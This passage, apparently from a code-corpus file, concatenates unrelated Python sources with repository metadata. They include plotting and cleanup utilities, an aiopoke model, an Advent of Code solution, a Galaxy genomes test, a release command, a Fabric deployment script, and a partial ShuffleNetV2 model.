        schemes.append(scheme)
    ax.legend(schemes, loc=2)
    ax.set_xlim(-1.0, 1.8)
    plt.ylabel('CDF')
    plt.xlabel('total reward')
    fig.savefig(os.path.join(args.store_dir, 'cdf_{}.png'.format(reward_key)))
def plot_bar(results, metric):
    """Save a bar chart of the per-scheme mean of ``metric``."""
    averages = {scheme: np.mean(data[metric]) for scheme, data in results.items()}
    fig = plt.figure(figsize=(16.0, 10.0))
    ax = fig.add_subplot(111)
    positions = np.arange(len(averages))
    ax.bar(positions, averages.values())
    ax.set_xticks(positions)
    ax.set_xticklabels(averages.keys())
    fig.savefig(os.path.join(args.store_dir, 'bar_{}.png'.format(metric)))
def clean():
    """
    Delete the experiment directories recorded in ``to_clean`` (incomplete
    runs), keeping the most recently modified one — it may still be running —
    unless ``args.include_last`` is set.
    """
    timestamps = []
    for logfile in to_clean:
        mtime = os.path.getmtime(logfile)
        timestamps.append(mtime)
        print("File {} was created at {}".format(logfile, mtime))
    timestamps.sort()
    if not args.include_last and timestamps:
        print("Skipping file created at {}: might be still running".format(timestamps[-1]))
        timestamps.pop()
    removing = []
    for stamp in timestamps:
        for logfile in to_clean:
            if os.path.getmtime(logfile) == stamp:
                target = os.path.dirname(os.path.dirname(logfile))
                print("Removing {}".format(target))
                removing.append(target)
    for target in removing:
        shutil.rmtree(target)
def main():
    """
    CLI entry point: parse arguments, gather per-(abr, trace) QoE results
    (optionally only from already-finished experiments), plot CDFs and bar
    charts, and optionally delete directories of failed experiments.
    """
    # parse arguments
    parser = argparse.ArgumentParser()
    parser.add_argument('result_dir', help='result directory', type=str)
    parser.add_argument('store_dir', help='result directory', type=str)
    parser.add_argument('video_chunks', help='result directory', type=int)
    parser.add_argument("--abrs", nargs="+", help='ABR list')
    parser.add_argument("--traces", nargs="+", help='Traces list')
    parser.add_argument('--partial', action="store_true", help="get the partial results")
    parser.add_argument('--allow_cleaning', action="store_true", help="if enabled, cleans the experiments that failed, a part of the most recent one (might still be running")
    parser.add_argument('--include_last', action="store_true", help="if enabled, also the last is getting cleaned")
    # args need to be global for simplicity
    global args
    args = parser.parse_args()
    # Shared accumulator of incomplete log files, appended to by get_qoe().
    global to_clean
    to_clean = []
    if not os.path.exists(args.store_dir):
        os.makedirs(args.store_dir)
    if args.partial:
        res = get_qoes_partial(args.abrs, args.traces)
    else:
        res = get_qoes(args.abrs, args.traces)
    for metric in metric_list:
        # CDFs are only drawn for the cumulative reward metrics.
        if "reward" in metric:
            plot_cdf(res, metric)
        plot_bar(res, metric)
    if args.allow_cleaning:
        print("Executing cleaning")
        clean()
if __name__ == "__main__":
    main()
| 2.109375 | 2 |
aiopoke/objects/utility/common_models/encounter.py | beastmatser/aiopokeapi | 3 | 17634 | from typing import TYPE_CHECKING, Any, Dict, List
from aiopoke.utils.minimal_resources import MinimalResource
from aiopoke.utils.resource import Resource
if TYPE_CHECKING:
from aiopoke.objects.resources import EncounterConditionValue, EncounterMethod
class Encounter(Resource):
    """
    A single wild-encounter slot: level range, encounter chance, the
    condition values that must hold, and the encounter method.
    """
    min_level: int
    max_level: int
    condition_values: List[MinimalResource["EncounterConditionValue"]]
    chance: int
    method: MinimalResource["EncounterMethod"]
    def __init__(
        self,
        *,
        min_level: int,
        max_level: int,
        condition_values: List[Dict[str, Any]],
        chance: int,
        method: Dict[str, Any],
    ):
        # Raw API dicts are wrapped into lazy MinimalResource references.
        self.min_level = min_level
        self.max_level = max_level
        self.condition_values = [
            MinimalResource(**condition_value) for condition_value in condition_values
        ]
        self.chance = chance
        self.method = MinimalResource(**method)
| 2.515625 | 3 |
2015/solutions/day1.py | rsizem2/aoc_2020 | 0 | 17635 |
def read_file(test = True):
    """
    Read the puzzle input, one stripped line per list element.

    :param test: When True read the sample input, otherwise the real input.
    :return: List of input lines with surrounding whitespace removed.
    """
    filename = '../tests/day1.txt' if test else '../input/day1.txt'
    with open(filename) as file:
        return [line.strip() for line in file]
def puzzle1():
    """Print the final floor reached: '(' goes up one, ')' goes down one."""
    instructions = read_file(False)[0]
    floor = 0
    for char in instructions:
        if char not in '()':
            raise ValueError
        floor += 1 if char == '(' else -1
    print(floor)
def puzzle2():
    """Print the 1-based position of the instruction that first enters floor -1."""
    instructions = read_file(False)[0]
    floor = 0
    for position, char in enumerate(instructions, start=1):
        if char not in '()':
            raise ValueError
        floor += 1 if char == '(' else -1
        if floor == -1:
            break
    print(position)
puzzle1()
puzzle2()
setup.py | Kamuish/StarSearch | 0 | 17636 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
# Packaging metadata for starsearch, a helper for digging into ESO archives.
setup(name='starsearch',
      version='0.3',
      description='Package to dig into the ESO archives',
      author='<NAME>',
      author_email='<EMAIL>',
      license='MIT',
      url='https://github.com/jdavidrcamacho/starsearch',
      packages=['starsearch'],
      install_requires=[
        'numpy',
        'astroquery',
        "astropy",
      ],
      )
| 0.980469 | 1 |
test/integration/test_genomes.py | beatrizserrano/galaxy | 0 | 17637 | import os
import tempfile
from unittest.mock import patch
from galaxy.exceptions import (
ObjectNotFound,
ReferenceDataError,
)
from galaxy_test.driver import integration_util
# Fixture rows for the builds file ("<dbkey>\t<description>"). Index 1 gets a
# matching .len file in setup; index 2 deliberately does not.
BUILDS_DATA = (
    "?\tunspecified (?)",
    "hg_test\tdescription of hg_test",
    "hg_test_nolen\tdescription of hg_test_nolen",
)
# Fixture rows for the hg_test .len file ("<chrom>\t<length>").
LEN_DATA = (
    "chr1\t248956422",
    "chr2\t242193529",
    "chr3\t198295559",
)
def get_key(has_len_file=True):
    """Return the dbkey of a fixture genome, with or without a .len file."""
    row = BUILDS_DATA[1 if has_len_file else 2]
    return row.split("\t")[0]
class GenomesTestCase(integration_util.IntegrationTestCase):
    """Integration tests for the /api/genomes endpoints, backed by small
    builds/len fixture files written into a temporary config directory."""
    @classmethod
    def handle_galaxy_config_kwds(cls, config):
        # Point the app at freshly generated builds/len fixture files.
        genomes_dir = cls.temp_config_dir("test_genomes")
        os.makedirs(genomes_dir)
        cls._setup_builds_file(config, genomes_dir)
        cls._setup_len_file(config, genomes_dir)
    @classmethod
    def _setup_builds_file(cls, config, genomes_dir):
        """Create builds file + set config option."""
        builds_file_path = os.path.join(genomes_dir, "builds.txt")
        config["builds_file_path"] = builds_file_path
        with open(builds_file_path, "w") as f:
            f.write("\n".join(BUILDS_DATA))
    @classmethod
    def _setup_len_file(cls, config, genomes_dir):
        """Create len file + set config option."""
        config["len_file_path"] = genomes_dir  # the config option is a dir
        key = get_key()
        len_file_path = os.path.join(genomes_dir, f"{key}.len")
        with open(len_file_path, "w") as f:
            f.write("\n".join(LEN_DATA))
    def test_index(self):
        # Index returns [description, dbkey] pairs, i.e. the fixture rows
        # split on tab and reversed.
        response = self._get("genomes")
        self._assert_status_code_is(response, 200)
        rval = response.json()
        expected_data = [item.split("\t")[::-1] for item in BUILDS_DATA]
        assert rval == expected_data
    def test_show_valid(self):
        key = get_key()
        response = self._get(f"genomes/{key}")
        self._assert_status_code_is(response, 200)
        rval = response.json()
        assert rval["id"] == key
        assert len(rval["chrom_info"]) == len(LEN_DATA)
    def test_show_valid_no_refdata(self):
        # A build without a .len file must surface ReferenceDataError (500).
        key = get_key(has_len_file=False)
        response = self._get(f"genomes/{key}")
        self._assert_status_code_is(response, 500)
        assert response.json()["err_code"] == ReferenceDataError.err_code.code
    def test_show_invalid(self):
        response = self._get("genomes/invalid")
        self._assert_status_code_is(response, 404)
        assert response.json()["err_code"] == ObjectNotFound.err_code.code
    def test_sequences(self):
        # Patch the genomes manager so no real reference data is needed.
        class RefDataMock:
            sequence = "test-value"
        key = get_key()
        with patch.object(self._app.genomes, "has_reference_data", return_value=True), patch.object(
            self._app.genomes, "_get_reference_data", return_value=RefDataMock()
        ):
            response = self._get(f"genomes/{key}/sequences")
        self._assert_status_code_is(response, 200)
        assert response.content == bytes(RefDataMock.sequence, "utf-8")
    def test_sequences_no_data(self):
        key = get_key()
        with patch.object(self._app.genomes, "has_reference_data", return_value=False):
            response = self._get(f"genomes/{key}/sequences")
        self._assert_status_code_is(response, 500)
        assert response.json()["err_code"] == ReferenceDataError.err_code.code
    def test_indexes(self):
        mock_key, mock_content, index_type, suffix = "mykey", "mydata", "fasta_indexes", ".fai"
        # write some data to a tempfile
        with tempfile.NamedTemporaryFile(dir=self._tempdir, suffix=suffix, mode="w", delete=False) as tf:
            tf.write(mock_content)
        # make a mock containing the path to the tempfile
        tmpfile_path = tf.name[: -len(suffix)]  # chop off the extention
        mock_data = [[mock_key, tmpfile_path]]
        with patch.object(self._app.tool_data_tables.data_tables[index_type], "data", new=mock_data):
            response = self._get(f"genomes/{mock_key}/indexes?type={index_type}")
        self._assert_status_code_is(response, 200)
        assert response.content == bytes(mock_content, "utf-8")
| 2.1875 | 2 |
examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | 0 | 17638 | import numpy as np
import pandas as pd
import os
from tqdm import tqdm
import pacmap
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
import umap
def darius1(numberDirectory):
    """
    Load one or both physionet-style training sets and visualise them with
    two dimensionality-reduction methods (PaCMAP and t-SNE).

    :param numberDirectory: 1 = training set A, 2 = set B, 3 = both.
    :raises ValueError: If numberDirectory is not 1, 2 or 3.
    """
    path = ""
    if numberDirectory == 1:
        directorys = [['training_setA/training/', 'p0']]
    elif numberDirectory == 2:
        directorys = [['training_setB/training/', 'p1']]
    elif numberDirectory == 3:
        directorys = [['training_setA/training/', 'p0'],
                      ['training_setB/training/', 'p1']]
    else:
        # BUG FIX: the original fell through with `directorys` unbound
        # (NameError) for any other value; fail with a clear error instead.
        raise ValueError("numberDirectory must be 1, 2 or 3")
    # Concatenate every pipe-separated record file from the chosen sets.
    dfs = []
    for directory, _file_head in directorys:
        for filename in tqdm(os.listdir(path + directory)):
            dfs.append(pd.read_csv(path + directory + filename, skiprows=0, sep='|'))
    df = pd.concat(dfs)
    # Only the None-filled frame is consumed below; the zero/mean-fill
    # variants computed by the original were dead code and are removed.
    df_nan_none = df.where(pd.notnull(df), None)
    ############################################################
    # PaCMAP embedding (n_neighbors=None picks the library default).
    embedding = pacmap.PaCMAP(n_dims=2, n_neighbors=None, MN_ratio=0.5, FP_ratio=2.0)
    X_transformed = embedding.fit_transform(df_nan_none.values, init="pca")
    plt.scatter(X_transformed[:, 0], X_transformed[:, 1], cmap="Spectral")
    plt.show()
    #############################################################
    # t-SNE embedding.
    X_embedded = TSNE(n_components=2, learning_rate='auto', init='random').fit_transform(df.values)
    fig, ax = plt.subplots(1, 1, figsize=(6, 6))
    # BUG FIX: the original plotted PaCMAP x against t-SNE y and passed
    # c=list(df.columns) (one colour per *column*, not per row).
    ax.scatter(X_embedded[:, 0], X_embedded[:, 1], cmap="Spectral", s=0.6)
release.py | jhofmann/yubiauth | 17 | 17639 | <filename>release.py
# Copyright (c) 2013 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from distutils import log
from distutils.core import Command
from distutils.errors import DistutilsSetupError
import os
import re
from datetime import date
class release(Command):
    """Distutils command that verifies, tests, signs, tags and publishes a
    new release of the package."""
    description = "create and release a new version"
    user_options = [
        ('keyid', None, "GPG key to sign with"),
        ('skip-tests', None, "skip running the tests"),
        ('pypi', None, "publish to pypi"),
    ]
    boolean_options = ['skip-tests', 'pypi']
    def initialize_options(self):
        # Option defaults (distutils hook).
        self.keyid = None
        self.skip_tests = 0
        self.pypi = 0
    def finalize_options(self):
        # Cache distribution metadata used by the later steps.
        self.cwd = os.getcwd()
        self.fullname = self.distribution.get_fullname()
        self.name = self.distribution.get_name()
        self.version = self.distribution.get_version()
    def _verify_version(self):
        # The first NEWS line must read "Version <x> (released <today>)".
        with open('NEWS', 'r') as news_file:
            line = news_file.readline()
        now = date.today().strftime('%Y-%m-%d')
        if not re.search(r'Version %s \(released %s\)' % (self.version, now),
                         line):
            raise DistutilsSetupError("Incorrect date/version in NEWS!")
    def _verify_tag(self):
        # Refuse to release if the git tag already exists.
        if os.system('git tag | grep -q "^%s\$"' % self.fullname) == 0:
            raise DistutilsSetupError(
                "Tag '%s' already exists!" % self.fullname)
    def _sign(self):
        # Produce dist/<fullname>.tar.gz.sig, reusing an upload signature
        # when one is present, then verify it.
        if os.path.isfile('dist/%s.tar.gz.asc' % self.fullname):
            # Signature exists from upload, re-use it:
            sign_opts = ['--output dist/%s.tar.gz.sig' % self.fullname,
                         '--dearmor dist/%s.tar.gz.asc' % self.fullname]
        else:
            # No signature, create it:
            sign_opts = ['--detach-sign', 'dist/%s.tar.gz' % self.fullname]
        if self.keyid:
            sign_opts.insert(1, '--default-key ' + self.keyid)
        self.execute(os.system, ('gpg ' + (' '.join(sign_opts)),))
        if os.system('gpg --verify dist/%s.tar.gz.sig' % self.fullname) != 0:
            raise DistutilsSetupError("Error verifying signature!")
    def _tag(self):
        # Create a signed git tag for the release.
        tag_opts = ['-s', '-m ' + self.fullname, self.fullname]
        if self.keyid:
            tag_opts[0] = '-u ' + self.keyid
        self.execute(os.system, ('git tag ' + (' '.join(tag_opts)),))
    def _do_call_publish(self, cmd):
        # Record success/failure for _publish() to inspect.
        self._published = os.system(cmd) == 0
    def _publish(self):
        # Publish tarball + signature through the external web repo's
        # `publish` script, located via $YUBICO_GITHUB_REPO.
        web_repo = os.getenv('YUBICO_GITHUB_REPO')
        if web_repo and os.path.isdir(web_repo):
            artifacts = [
                'dist/%s.tar.gz' % self.fullname,
                'dist/%s.tar.gz.sig' % self.fullname
            ]
            cmd = '%s/publish %s %s %s' % (
                web_repo, self.name, self.version, ' '.join(artifacts))
            self.execute(self._do_call_publish, (cmd,))
            if self._published:
                self.announce("Release published! Don't forget to:", log.INFO)
                self.announce("")
                self.announce("    (cd %s && git push)" % web_repo, log.INFO)
                self.announce("")
            else:
                self.warn("There was a problem publishing the release!")
        else:
            self.warn("YUBICO_GITHUB_REPO not set or invalid!")
            self.warn("This release will not be published!")
    def run(self):
        # Full pipeline: verify, changelog, test, sdist, (pypi), sign, tag,
        # publish. Must run from the package root recorded earlier.
        if os.getcwd() != self.cwd:
            raise DistutilsSetupError("Must be in package root!")
        self._verify_version()
        self._verify_tag()
        self.execute(os.system, ('git2cl > ChangeLog',))
        if not self.skip_tests:
            self.run_command('check')
            # Nosetests calls sys.exit(status)
            try:
                self.run_command('nosetests')
            except SystemExit as e:
                if e.code != 0:
                    raise DistutilsSetupError("There were test failures!")
        self.run_command('sdist')
        if self.pypi:
            cmd_obj = self.distribution.get_command_obj('upload')
            cmd_obj.sign = True
            if self.keyid:
                cmd_obj.identity = self.keyid
            self.run_command('upload')
        self._sign()
        self._tag()
        self._publish()
        self.announce("Release complete! Don't forget to:", log.INFO)
        self.announce("")
        self.announce("    git push && git push --tags", log.INFO)
        self.announce("")
| 1.585938 | 2 |
fabfile.py | 8081594571/bgtools_web | 1 | 17640 | <gh_stars>1-10
# Credit goes to https://bitbucket.org/spookylukey/django-fabfile-starter/src
import os
import datetime as dt
from io import StringIO
import json
import posixpath
import fabric
import requests
from fabsettings import (USER, HOST, DJANGO_APP_NAME,
DJANGO_APPS_DIR, LOGS_ROOT_DIR,
APP_PORT, GUNICORN_WORKERS, DJANGO_PROJECT_NAME,
STAGING_APP_PORT)
def upload_template(c, filename, destination, context=None, template_dir=None):
    """
    Render a Jinja2 template and upload the result to the remote host.

    :param c: Fabric connection.
    :param filename: Template file name, relative to ``template_dir``.
    :param destination: Remote path for the rendered file.
    :param context: Mapping of template variables (defaults to empty).
    :param template_dir: Directory holding the template (defaults to CWD).
    :return: The result of ``c.put``.
    """
    template_dir = template_dir or os.getcwd()
    from jinja2 import Environment, FileSystemLoader
    jenv = Environment(loader=FileSystemLoader(template_dir))
    # CLEANUP: dropped the dead `text = None` initialiser and the
    # commented-out utf-8 encode workaround from the original.
    text = jenv.get_template(filename).render(**(context if context is not None else {}))
    # Upload the rendered text as an in-memory file.
    return c.put(
        StringIO(text),
        destination,
    )
def venv(c):
    """
    Return a context manager that prefixes remote commands with the
    project's virtualenv activation.
    """
    activate = "source {}/bin/activate".format(c.config.bgtools.VENV_DIR)
    return c.prefix(activate)
def install_dependencies(c):
    """Create the virtualenv if needed and install requirements into it."""
    ensure_virtualenv(c)
    args = c.config.bgtools
    with venv(c), c.cd(args.SRC_DIR):
        c.run("pip install -U -r requirements.txt")
def file_exists(c, path):
    """
    Return True if ``path`` exists on the remote host (via ``stat``).

    BUG FIX: the original ran the ``stat`` command twice — once for the
    debug print and once for the return value — and printed ``bool(Result)``
    while returning ``Result.ok``. Run it once and report the value used.
    """
    result = c.run('stat {}'.format(path), hide=True, warn=True)
    print('checking existence of: {}: {}'.format(path, result.ok))
    return result.ok
def ensure_virtualenv(c):
    """
    Create the project virtualenv — plus a .pth file linking it to the
    source tree — unless it already exists.
    """
    args = c.config.bgtools
    ensure_dir(c, args.SRC_DIR)
    if file_exists(c, args.VENV_DIR):
        return
    with c.cd(args.DJANGO_APP_ROOT):
        c.run(f"virtualenv --no-site-packages --python={args.PYTHON_BIN} {args.venv_subdir}")
        c.run(f"echo {args.SRC_DIR} > {args.venv_subdir}/lib/{args.PYTHON_BIN}/site-packages/projectsource.pth")
def ensure_dir(c, d):
    """Create remote directory ``d`` (with parents) if it does not exist."""
    print('checking existence of {} on {}'.format(d, c))
    if file_exists(c, d):
        return
    # The parent directory normally already exists, created via the
    # hosting control panel with the correct app name.
    print('making {}'.format(d))
    c.run("mkdir -p {}".format(d))
def copy_settings(c):
    """
    Copy the mode-specific settings module into the project and append
    the STAGING flag line to it.
    """
    args = c.config.bgtools
    with c.cd(args.LOCAL_DIR):
        fname = 'settings_{}.py'.format(args.mode)
        c.local('cp {} bgtools/bgtools/private_settings.py'.format(fname))
        # FIX: the original mixed types ('True' string vs False bool); the
        # written text was the same, but make the intent explicit.
        staging_flag = 'True' if args.staging else 'False'
        c.local('echo STAGING={} >> bgtools/bgtools/private_settings.py'.format(staging_flag))
def rsync(c, src, dest):
    """rsync ``src`` from the local machine to ``dest`` on the deploy host."""
    args = c.config.bgtools
    c.local('rsync -avz {} {}:{}'.format(src, args.host, dest))
def rsync_source(c):
    """
    Push the local Django source tree to the server.
    """
    args = c.config.bgtools
    local_src = os.path.join(args.LOCAL_DIR, 'bgtools')
    rsync(c, local_src, args.DJANGO_APP_ROOT)
def collect_static(c):
    """
    Run Django's collectstatic on the server inside the virtualenv.
    """
    args = c.config.bgtools
    with venv(c), c.cd(args.SRC_DIR):
        c.run('python manage.py collectstatic --no-input')
def checkout_and_install_libs(c):
    """
    Check out (or rsync, for local libs) every library listed in libs.json
    into the remote checkout dir, pip-install each into the virtualenv, and
    upload rendered version/changelog HTML snippets into the app templates.

    libs.json entry shape (inferred from usage — TODO confirm):
    ``{lib: {"repo": ..., "owner": ..., "name": ..., "path": ...,
    "branch": ..., "extras": [[src, target], ...]}}``; ``repo == 'local'``
    means the library is rsynced from the local machine instead of cloned.
    """
    args = c.config.bgtools
    libs = json.load(open('libs.json'))
    ensure_dir(c, args.CHECKOUT_DIR)
    with c.cd(args.CHECKOUT_DIR):
        for lib, params in libs.items():
            print('handling ' + lib)
            libdir = params['repo']
            if libdir != 'local':
                params['branch'] = args.branch
            else:
                # Local library: rsync it over, install, and skip the
                # git/github handling below.
                with c.cd(args.LOCAL_DIR):
                    rsync(c, posixpath.join(params['path'], params['name']),
                          args.CHECKOUT_DIR)
                with c.cd(params['name']), venv(c):
                    c.run('pip install -U .')
                continue
            github_url = 'https://github.com/{}/{}'.format(params['owner'], params['repo'])
            if not file_exists(c, libdir):
                c.run('git clone {}.git'.format(github_url))
            with c.cd(libdir):
                c.run('git fetch origin')
                # Debug (or tag=head) deployments track the branch tip;
                # release deployments check out a version tag.
                if args.mode == 'debug' or args.tag == 'head':
                    c.run('git checkout {}'.format(params['branch']))
                    c.run('git pull')
                    version = c.run('git rev-parse {}'.format(params['branch'])).stdout
                    version_url = '{}/commits/{}'.format(github_url, version)
                elif args.mode == 'release':
                    tag = args.tag
                    if tag == 'latest':
                        # Highest v* tag by version sort.
                        tag = c.run('git tag -l "v*" --sort=-v:refname').stdout.split()[0]
                    c.run('git checkout {}'.format(tag))
                    version = tag
                    version_url = '{}/releases/tag/{}'.format(github_url, tag)
                # Copy any extra local files into the checkout before install.
                for src, target in params.get('extras', []):
                    with c.cd(args.LOCAL_DIR):
                        rsync(c, posixpath.join(args.LOCAL_DIR, 'extras', lib, src),
                              posixpath.join(args.CHECKOUT_DIR, libdir, target))
                with venv(c):
                    c.run('pip install -U .')
            with c.cd(args.SRC_DIR):
                # Fetch the GitHub release list and render version/changelog
                # template snippets into the Django app's template dir.
                r = requests.get('https://api.github.com/repos/{}/{}/releases'.format(params['owner'],
                                                                                      params['repo']))
                changelog = r.json()
                changelog = [{'url': ch['html_url'],
                              'date': dt.datetime.strptime(ch['published_at'][:10], '%Y-%m-%d').date(),
                              'name': ch['name'],
                              'tag': ch['tag_name'],
                              'description': ch['body']}
                             for ch in changelog]
                for tname, context in [('version', {'version': version, 'url': version_url}),
                                       ('changelog', {'changelog': changelog})]:
                    print('uploading {}_{}.html'.format(lib, tname))
                    upload_template(c, '{}_template.html'.format(tname),
                                    posixpath.join(args.SRC_DIR,
                                                   DJANGO_APP_NAME,
                                                   'templates',
                                                   DJANGO_APP_NAME,
                                                   '{}_{}.html'.format(lib, tname)),
                                    context=context,
                                    template_dir=posixpath.join(args.LOCAL_DIR, 'templates'))
@fabric.task
def stop_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
    """
    Stop the webserver that is running the Django instance
    """
    populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
    pidfile = c.config.bgtools.GUNICORN_PIDFILE
    c.run("kill $(cat {})".format(pidfile))
def _webserver_command(c):
    """Build the gunicorn daemon command line for the current configuration."""
    args = c.config.bgtools
    port = APP_PORT if not args.staging else STAGING_APP_PORT
    return (
        f'{args.VENV_DIR}/bin/gunicorn '
        f'--error-logfile={args.GUNICORN_ERROR_LOGFILE} '
        f'--access-logfile={args.GUNICORN_ACCESS_LOGFILE} '
        '--capture-output '
        f'-b 127.0.0.1:{port} '
        f'-D -w {GUNICORN_WORKERS} --pid {args.GUNICORN_PIDFILE} '
        f'{args.WSGI_MODULE}:application'
    )
@fabric.task
def start_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
    """
    Starts the webserver that is running the Django instance
    """
    populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
    start_webserver_internal(c)
def start_webserver_internal(c):
    """Launch gunicorn (assumes args were already populated on the config)."""
    command = _webserver_command(c)
    print('starting new webserver: "{}"'.format(command))
    with c.cd(c.config.bgtools.SRC_DIR):
        c.run(command, pty=False, echo=True)
@fabric.task(hosts=[HOST])
def restart_webserver(c, mode=None, tag=None, staging=None, branch=None):
    """
    Restarts the webserver that is running the Django instance
    """
    populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
    restart_webserver_internal(c)
def restart_webserver_internal(c):
    """HUP the running gunicorn master, or start one if no pidfile exists."""
    args = c.config.bgtools
    if not file_exists(c, args.GUNICORN_PIDFILE):
        start_webserver_internal(c)
        return
    print('killing existing webserver')
    c.run("kill -HUP $(cat {})".format(args.GUNICORN_PIDFILE), echo=True)
def populate_arg(args, existing, argname):
    """Return ``existing`` unless it is None, else fall back to ``args[argname]``."""
    if existing is not None:
        return existing
    return args[argname]
def populate_args(c, **kwargs):
    """
    Merge CLI kwargs into the config (kwargs win when not None) and derive
    every remote path for the chosen deployment (staging or live).
    """
    args = c.config.bgtools
    # env.use_ssh_config = True
    for k, v in kwargs.items():
        # NOTE(review): populate_arg is evaluated twice per key (print +
        # setattr); harmless since it is pure, but could be hoisted.
        print('setting {} to {}'.format(k, populate_arg(args, v, k)))
        setattr(args, k, populate_arg(args, v, k))
    project = DJANGO_PROJECT_NAME
    if args.staging:
        project += '_staging'
    args.DJANGO_APP_ROOT = posixpath.join(DJANGO_APPS_DIR, project)
    # Python version
    args.PYTHON_BIN = "python3.5"
    # env.PYTHON_PREFIX = "" # e.g. /usr/local Use "" for automatic
    # env.PYTHON_FULL_PATH = (posixpath.join(env.PYTHON_PREFIX, 'bin', env.PYTHON_BIN)
    # if env.PYTHON_PREFIX else env.PYTHON_BIN)
    # Derived gunicorn/deploy paths used by the other tasks.
    args.GUNICORN_PIDFILE = posixpath.join(args.DJANGO_APP_ROOT, 'gunicorn.pid')
    args.GUNICORN_ERROR_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
                                                 'gunicorn_error_{}.log'.format(project))
    args.GUNICORN_ACCESS_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
                                                  'gunicorn_access_{}.log'.format(project))
    args.SRC_DIR = posixpath.join(args.DJANGO_APP_ROOT, DJANGO_PROJECT_NAME)
    args.VENV_DIR = posixpath.join(args.DJANGO_APP_ROOT, args.venv_subdir)
    args.CHECKOUT_DIR = posixpath.join(args.DJANGO_APP_ROOT, 'checkouts')
    args.WSGI_MODULE = '{}.wsgi'.format(DJANGO_PROJECT_NAME)
    args.LOCAL_DIR = os.path.dirname(os.path.realpath(__file__))
@fabric.task(hosts=[HOST])
def deploy(c, mode=None, staging=True, tag=None, branch=None):
    """
    Full deployment pipeline: populate config, copy settings, sync source,
    install dependencies, check out vendored libraries, collect static
    files, then restart (or start) the webserver.
    """
    populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
    print(c.config.bgtools)
    copy_settings(c)
    rsync_source(c)
    install_dependencies(c)
    checkout_and_install_libs(c)
    collect_static(c)
    restart_webserver_internal(c)
| 2.21875 | 2 |
Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 1 | 17641 | import torch
from torch import nn
from torch.autograd import Variable
import config
def init_weights(self):
    """Xavier-initialise every Conv2d weight in ``self`` and zero its bias."""
    for module in self.modules():
        if not isinstance(module, nn.Conv2d):
            continue
        nn.init.xavier_normal_(module.weight)
        if module.bias is not None:
            nn.init.constant_(module.bias, 0)
def conv(in_channels, out_channels, kernel_size, stride):
    """Conv2d -> BatchNorm2d -> ReLU block (conv has no bias; BN follows)."""
    return nn.Sequential(
        nn.Conv2d(in_channels, out_channels, kernel_size, stride, bias=False),
        nn.BatchNorm2d(out_channels),
        nn.ReLU(inplace=True),
    )
def channel_shuffle(x, num_groups):
    """Interleave channels across ``num_groups`` groups (ShuffleNet shuffle)."""
    batch, channels, height, width = x.size()
    grouped = x.reshape(batch, num_groups, channels // num_groups, height, width)
    shuffled = grouped.permute(0, 2, 1, 3, 4)
    return shuffled.reshape(batch, channels, height, width)
class BasicUnit(nn.Module):
    """
    ShuffleNetV2 basic unit (stride 1): split the channels, transform the
    right half with 1x1 -> 3x3 depthwise -> 1x1 convolutions, concatenate
    with the untouched left half, then channel-shuffle.
    """
    def __init__(self, in_channels, splits=2, groups=2):
        super(BasicUnit, self).__init__()
        self.in_channels = in_channels
        self.splits = splits
        self.groups = groups
        # Per-branch channel count after the split.
        in_channels = int(in_channels / self.splits)
        self.right = nn.Sequential(*[
            nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False),
            nn.BatchNorm2d(in_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1, bias=False, groups=in_channels),
            nn.BatchNorm2d(in_channels),
            nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False),
            nn.BatchNorm2d(in_channels),
            nn.ReLU(inplace=True)
        ])
        init_weights(self)
    def forward(self, x):
        # Split channels, transform the right half, re-join, then shuffle.
        split = torch.split(x, int(self.in_channels / self.splits), dim=1)
        x_left, x_right = split
        x_right = self.right(x_right)
        x = torch.cat([x_left, x_right], dim=1)
        out = channel_shuffle(x, self.groups)
        # print("Basic Unit", out.size())
        return out
class DownUnit(nn.Module):
    """ShuffleNetV2 downsampling unit: two stride-2 branches, concat, shuffle.

    Both branches see the full input; each halves the spatial resolution and
    outputs out_channels // 2 channels, so the concatenation has out_channels.
    """

    def __init__(self, in_channels, out_channels, groups=2):
        super(DownUnit, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.groups = groups
        half_out = self.out_channels // 2
        # Left branch: 3x3 depthwise (stride 2) -> 1x1 pointwise.
        self.left = nn.Sequential(
            nn.Conv2d(self.in_channels, self.in_channels, kernel_size=3, stride=2,
